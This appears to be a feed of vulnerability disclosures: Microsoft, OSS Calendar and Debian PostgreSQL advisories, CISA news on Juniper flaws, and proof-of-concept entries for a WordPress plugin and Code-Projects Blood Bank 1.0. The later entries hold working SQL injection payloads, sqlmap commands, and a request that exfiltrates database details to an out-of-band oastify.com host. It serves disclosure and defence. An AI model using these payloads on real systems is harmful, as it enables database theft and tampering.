**How could an attacker exploit this vulnerability?**

An attacker could exploit the vulnerability by tricking an authenticated user into attempting to connect to a malicious SQL server via OLEDB, which could result in the server receiving a malicious networking packet. This could allow the attacker to execute code remotely on the client.

CVE-2023-36402: Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

SQL injection vulnerability in OSS Calendar versions prior to v.2.0.3 allows a remote authenticated attacker to execute arbitrary code or obtain and/or alter the information stored in the database by sending a specially crafted request.

\* English version is below \*  
平素より OSS Calendar をご利用いただきありがとうございます。  
この度 OSS Calendar に脆弱性が発見されました。  
修正されたバージョンである 2.0.3 をリリースしましたのでお知らせいたします。

【対象アプリケーション】  
Version 2.0.3 より前にリリースされた OSS Calendar.

【概要】  
　OSS Calendar にログインしたユーザーによる SQL インジェクション攻撃が可能となります。

【影響】  
　攻撃者は、脆弱な OSS Calendar にログインする事で、以下の事象を引き起こすことが可能です。  
　　・サーバ内の情報窃取  
　　・サーバ内の情報改ざん  
　　・サーバ上のファイルを書き換えることによるシステム破壊

　以下、CVSS v3を基準とした影響度です。

　・深刻度　重要  
　　CVSS v3 基本値：8.8　　CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

【回避方法】  
　OSS Calendar にログインした状態でのみ本脆弱性は悪用可能となります。  
　以下の対策を講じることで、攻撃者のログインを阻止し、脆弱性の影響を  
　回避することが期待できます  
　　・対象システムに対するアクセスを信頼できる接続元のみに制限  
　　・不要なアカウントの削除  
　　・容易に推測可能なパスワードを利用している場合、より複雑なパスワードへの変更

【対策方法】  
　OSS Calendar Version 2.0.3 へのバージョンアップを実施してください。  
　バージョンアップの方法については GitHub の README.md をご確認ください。

　なお、シンキングリードのサポート契約を締結されているお客様に対しましては修正の適用が完了しておりますのでご安心いただければと存じます。

—- English Version —-

A vulnerability has been identified in OSS Calendar.

Affected Products:  
OSS Calendar prior to Version 2.0.3.

Summary:  
A user who is logged in to the OSS Calendar could execute an SQL Injection attack.

Impact:  
These impacts will occur when an attacker who is logged into the OSS Calendar exploits the vulnerability.

– Information theft and tampering  
– System destruction

The impact according to CVSS v3 is as follows:  
Severity: Important  
CVSS v3 Base Score: 8.8  
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Workaround:  
This vulnerability can only be exploited when an attacker is logged into the OSS Calendar.  
To bypass the impact, consider implementing the following workarounds:

– Limit access to trusted sources.  
– Delete unnecessary accounts.  
– Use more complex and strong passwords in place of simple and weak ones.

Solution:  
Update to the OSS Calendar version 2.0.3.  
For instructions on how to upgrade, please refer to README.md on GitHub.

Furthermore, for customers under our support contract at Thinkingreed, individual corrections have already been completed to address this vulnerability. We hope this provides you with peace of mind.

CVE-2023-47609: Version 2.0.3リリースのお知らせ | OSSカレンダー

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given a November 17, 2023, deadline for federal agencies and organizations to apply mitigations to secure against a number of security flaws in Juniper Junos OS that came to light in August.
The agency on Monday added five vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active

Cyber Attack / Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given a November 17, 2023, deadline for federal agencies and organizations to apply mitigations to secure against a number of security flaws in Juniper Junos OS that came to light in August.

The agency on Monday added five vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation -

*   **CVE-2023-36844** (CVSS score: 5.3) - Juniper Junos OS EX Series PHP External Variable Modification Vulnerability
*   **CVE-2023-36845** (CVSS score: 5.3) - Juniper Junos OS EX Series and SRX Series PHP External Variable Modification Vulnerability
*   **CVE-2023-36846** (CVSS score: 5.3) - Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability
*   **CVE-2023-36847** (CVSS score: 5.3) - Juniper Junos OS EX Series Missing Authentication for Critical Function Vulnerability
*   **CVE-2023-36851** (CVSS score: 5.3) - Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability

The vulnerabilities, per Juniper, could be fashioned into an exploit chain to achieve remote code execution on unpatched devices. Also added to the list is CVE-2023-36851, which has been described as a variant of the SRX upload flaw.

Juniper, in an update to its advisory on November 8, 2023, said it's "now aware of successful exploitation of these vulnerabilities," recommending that customers update to the latest versions with immediate effect.

The details surrounding the nature of the exploitation are currently unknown.

In a separate alert, CISA has also warned that the Royal ransomware gang may rebrand as BlackSuit owing to the fact that the latter shares a "number of identified coding characteristics similar to Royal."

The development comes as Cyfirma disclosed that exploits for critical vulnerabilities are being offered for sale on darknet forums and Telegram channels.

"These vulnerabilities encompass elevation of privilege, authentication bypass, SQL injection, and remote code execution, posing significant security risks," the cybersecurity firm said, adding, "ransomware groups are actively searching for zero-day vulnerabilities in underground forums to compromise a large number of victims."

It also follows revelations from Huntress that threat actors are targeting multiple healthcare organizations by abusing the widely-used ScreenConnect remote access tool used by Transaction Data Systems, a pharmacy management software provider, for initial access.

"The threat actor proceeded to take several steps, including installing additional remote access tools such as ScreenConnect or AnyDesk instances, to ensure persistent access to the environments," Huntress noted.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Sets a Deadline - Patch Juniper Junos OS Flaws Before November 17

Debian Linux Security Advisory 5554-1 - Several vulnerabilities have been discovered in the PostgreSQL database system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5554-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
November 13, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : postgresql-13  
CVE ID         : CVE-2023-5868 CVE-2023-5869 CVE-2023-5870 CVE-2023-39417

Several vulnerabilities have been discovered in the PostgreSQL  
database system.

CVE-2023-5868

    Jingzhou Fu discovered a memory disclosure flaw in aggregate  
    function calls.

CVE-2023-5869

    Pedro Gallegos reported integer overflow flaws resulting in buffer  
    overflows in the array modification functions.

CVE-2023-5870

    Hemanth Sandrana and Mahendrakar Srinivasarao reported that the  
    pg_cancel_backend role can signal certain superuser processes,  
    potentially resulting in denial of service.

CVE-2023-39417

    Micah Gate, Valerie Woolard, Tim Carey-Smith, and Christoph Berg  
    reported that an extension script using @substitutions@ within  
    quoting may allow to perform an SQL injection for an attacker having  
    database-level CREATE privileges.

For the oldstable distribution (bullseye), these problems have been  
fixed in version 13.13-0+deb11u1.

We recommend that you upgrade your postgresql-13 packages.

For the detailed security status of postgresql-13 please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/postgresql-13

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmVSk+VfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q9rQ/8Co/OgM7q3kXV9szTFTh0K0s2+7W04CRaNA+BGESpsnKUAG22FApRbGMG  
txECE/zyhih7Bq6knDkjwU1TS3mzd5ra0aQEvuErPcDf1oVAm5rzEf8C2bDBZxqo  
ZuuV03fuh468TQWdUaICoKWueLbSOr0wkh8YLdTOiwSldQg4JkJ2rmWLVx9mxsuT  
5XQRESxgMekCkM3s1H+dIo3Bncf6hW78RYn3oi2i2txwwrEmxsYadaBbvqEkdd/G  
0/mrkaxF/H9g0CCxrVlcHCfGNfcd9aM2mcYjQEUeypb3CV6ybQpWKgwc0hxXFKUS  
ndc9iP/DuOnAJTMOQAzxZ5R4wincO5Godb1x5jdCcSCMOVt/5vj/QF5tAvI/85Rq  
lwgSY/orrB0GeRtNrbi82UZsvLuiOUbgkad3+qEthD+9FQJgTGvMqQqgC6Mr9Ga1  
VVlUwMsZsVjkjbeMm75i7dKi5ya+uqlCdVp3zDw9jGUcfo2+BG2uVepVdoNqWu4b  
X72TdKbZ2sSkSHh4dt6Qyg5GNazix2DvmE+vB2J8jpbodICgAQ43Jq3Hruda4BjD  
V0C8a+u/u3Mh7Kax4niHGTYK666JyTMUqdEkJGtLx59POAdqCpIVi3+lGUSu51x/  
E5pXXHzEuEYCckpxZ0sJctDG1zOCa0BbTNBVYyJEzaAvAhCzpsI=  
=frzV  
-----END PGP SIGNATURE-----

Debian Security Advisory 5554-1

Debian Linux Security Advisory 5553-1 - Several vulnerabilities have been discovered in the PostgreSQL database system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5553-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
November 13, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : postgresql-15  
CVE ID         : CVE-2023-5868 CVE-2023-5869 CVE-2023-5870 CVE-2023-39417  
                 CVE-2023-39418

Several vulnerabilities have been discovered in the PostgreSQL  
database system.

CVE-2023-5868

    Jingzhou Fu discovered a memory disclosure flaw in aggregate  
    function calls.

CVE-2023-5869

    Pedro Gallegos reported integer overflow flaws resulting in buffer  
    overflows in the array modification functions.

CVE-2023-5870

    Hemanth Sandrana and Mahendrakar Srinivasarao reported that the  
    pg_cancel_backend role can signal certain superuser processes,  
    potentially resulting in denial of service.

CVE-2023-39417

    Micah Gate, Valerie Woolard, Tim Carey-Smith, and Christoph Berg  
    reported that an extension script using @substitutions@ within  
    quoting may allow to perform an SQL injection for an attacker having  
    database-level CREATE privileges.

CVE-2023-39418

    Dean Rasheed reported that the MERGE command to enforce UPDATE or  
    SELECT row security policies.

For the stable distribution (bookworm), these problems have been fixed  
in version 15.5-0+deb12u1.

We recommend that you upgrade your postgresql-15 packages.

For the detailed security status of postgresql-15 please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/postgresql-15

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmVSkZ9fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0TEeA//aemORcM7eOsmMwuyYGoAjpV3o2f6Ji58KN/JunoHAU7TytATJbH1ImSt  
llsXmd4gOnBCrI2HbpFwHTlgP38Ie3XGYh9Ubtb2sfbOWDgOc+OGF9GdgJ2zc50k  
c/iLHIH4MmhPqC8r2aDSHM74iM0W4iXGp6d4APRIUWcTVP9GXCpVucF1WA0Oy+Pw  
wLbqP4yp+w+eyjkZZ7sZ8vx5Q5Yk8YBjaXkoOwlR8+3yp7rzLzM8VHYn8hSQ6JLz  
RJ6/gKizEHNLU1N6fq6UTHNINRq/C5fbwobW5Of8hPr/N+DpzpXI70PXj5DBFC9k  
MNpAsc9DlQN0RFKVIKYWBiotOV6LHKnUZlHNRzNTS+nyUmdQmc7BO0tkSm8ChNF2  
+YPj3LIlZwhgqSn/iI7BA62U5kp3UeF1EoRA1Mfxn7JK2xKo7cq2opluu3dndLIK  
XsLjUcTOGMq6pNosz9lsJNAvqU7a5cSKCEBGHFdxZct1RHkbPNFcZUmsFhAcxpwx  
klHYq1Pl54g1sNZS4KWmTW1TlGKj9d0teC9W8kQ+sGbF3HB5O+RsC+1zAvySMLJ/  
u7U793pwaIc/B8KKSsDTqUe9wLLkNsRT/BDxCfhs7qj/cRP0++dwLDYGHtSzqThg  
B/X8uUrJHsHWJ2IhK+jCpIufOaRSqoozsIqo7FNGbDZlt0ml/h0=  
=CPWu  
-----END PGP SIGNATURE-----

Debian Security Advisory 5553-1

WordPress Contact Form to Any API plugin version 1.1.2 suffers from a remote SQL injection vulnerability.

    # Exploit Title: WP Plugins Contact Form to Any API <= 1.1.2 - SQL Injection# Date: 12-11-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/# Vendor Homepage: https://www.itpathsolutions.com/# Version: 1.1.2 # Tested on: Windows, Linux# CVE: CVE-2023-32741# Product DescriptionContact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.# Vulnerability overviewThe Wordpress plugins Contact Form to Any API <= 1.1.2 is vulnerable to Blind SQL Injection (time-based) via the form_id parameter on the /wp-admin/edit.php endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of ConceptAffected Endpoint: /wp-admin/edit.php?post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=Affected Parameter: form_idpayload: 1 UNION SELECT NULL,NULL,NULL,NULL,NULL,SLEEP(5)-- -# RecommendationUpgrade to version 1.1.3

WordPress Contact Form To Any API 1.1.2 SQL Injection

SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary commands via the 'reqid' parameter.

    ---
    GET /bloodbank/file/cancel.php?reqid=4'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.7mus27hip62tznk3gy4n7z3fo6uxin6c.oastify.com\\a.txt')))%2b' HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Referer: http://localhost/bloodbank/sentrequest.php?msg=You%20have%20requested%20for%20blood%20group%20A+.%20Our%20team%20will%20contact%20you%20soon.
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    ---

CVE-2023-46021: GitHub - ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

SQL Injection vulnerability in hospitalLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'hemail' and 'hpassword' parameters.

    ---
    Parameter: hemail (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu&hpassword=test&hlogin=Login
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 6 columns
        Payload: hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login
    ---
    

    ---
    Parameter: hpassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: hemail=test@test&hpassword=test' AND 4940=(SELECT (CASE WHEN (4940=4940) THEN 4940 ELSE (SELECT 5623 UNION SELECT 6789) END))-- -&hlogin=Login
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: hemail=test@test&hpassword=test' OR (SELECT 8207 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(8207=8207,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TrPm&hlogin=Login
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: hemail=test@test&hpassword=test' AND (SELECT 3303 FROM (SELECT(SLEEP(5)))PdPC)-- lTZZ&hlogin=Login
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 6 columns
        Payload: hemail=test@test&hpassword=test' UNION ALL SELECT NULL,CONCAT(0x716a7a6b71,0x5271514f636f6f46476f6365424b6e6166454c725751704d6f6c467968626a4e725172785955416d,0x7170767a71),NULL,NULL,NULL,NULL-- -&hlogin=Login
    ---

CVE-2023-46014: GitHub - ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

SQL Injection vulnerability in receiverLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'remail' and 'rpassword' parameters.

    ---
    Parameter: remail (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9644=9644,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyEh&rpassword=test&rlogin=Login
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: remail=test@test' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))hWQj)-- NUfN&rpassword=test&rlogin=Login
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 7 columns
        Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4e764e5452486270544a6e4c705a79535a667441756d556b416e7961484a534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login
    ---
    

    ---
    Parameter: rpassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(6087=6087,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VRqW&rlogin=Login
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: remail=test@test&rpassword=test' AND (SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy&rlogin=Login
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 7 columns
        Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d776376736a706f47796d474a736a48566f72625a4e6d537247665a444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login
    ---

CVE-2023-46017: GitHub - ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 \allows attackers to run arbitrary SQL commands via 'remail' parameter.

**CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability**

*   Exploit Author: ersinerenler

**Vendor Homepage**

*   https://code-projects.org/blood-bank-in-php-with-source-code

**Software Link**

*   https://download-media.code-projects.org/2020/11/Blood\_Bank\_In\_PHP\_With\_Source\_code.zip

**Overview**

*   Code-Projects Blood Bank V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'remail' parameter in the receiverReg.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.

**Vulnerability Details**

*   CVE ID: CVE-2023-46018
*   Affected Version: Blood Bank V1.0
*   Vulnerable File: /receiverReg.php
*   Parameter Name: remail
*   Attack Type: Local

**Description**

*   The lack of proper input validation and sanitization on the 'remail' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database

**Proof of Concept (PoC) :**

*   Save the POST request of receiverReg.php to a request.txt file.

    ---
    POST /bloodbank/file/receiverReg.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Content-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868
    Content-Length: 877
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/bloodbank/register.php
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rname"
    
    test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rbg"
    
    A+
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rcity"
    
    test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rphone"
    
    05555555555
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="remail"
    
    test@test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rpassword"
    
    test123
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rregister"
    
    Register
    -----------------------------2653697510272605730288393868--
    
    ---
    

*   sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db
    
*   current database: bloodbank

Tag

#sql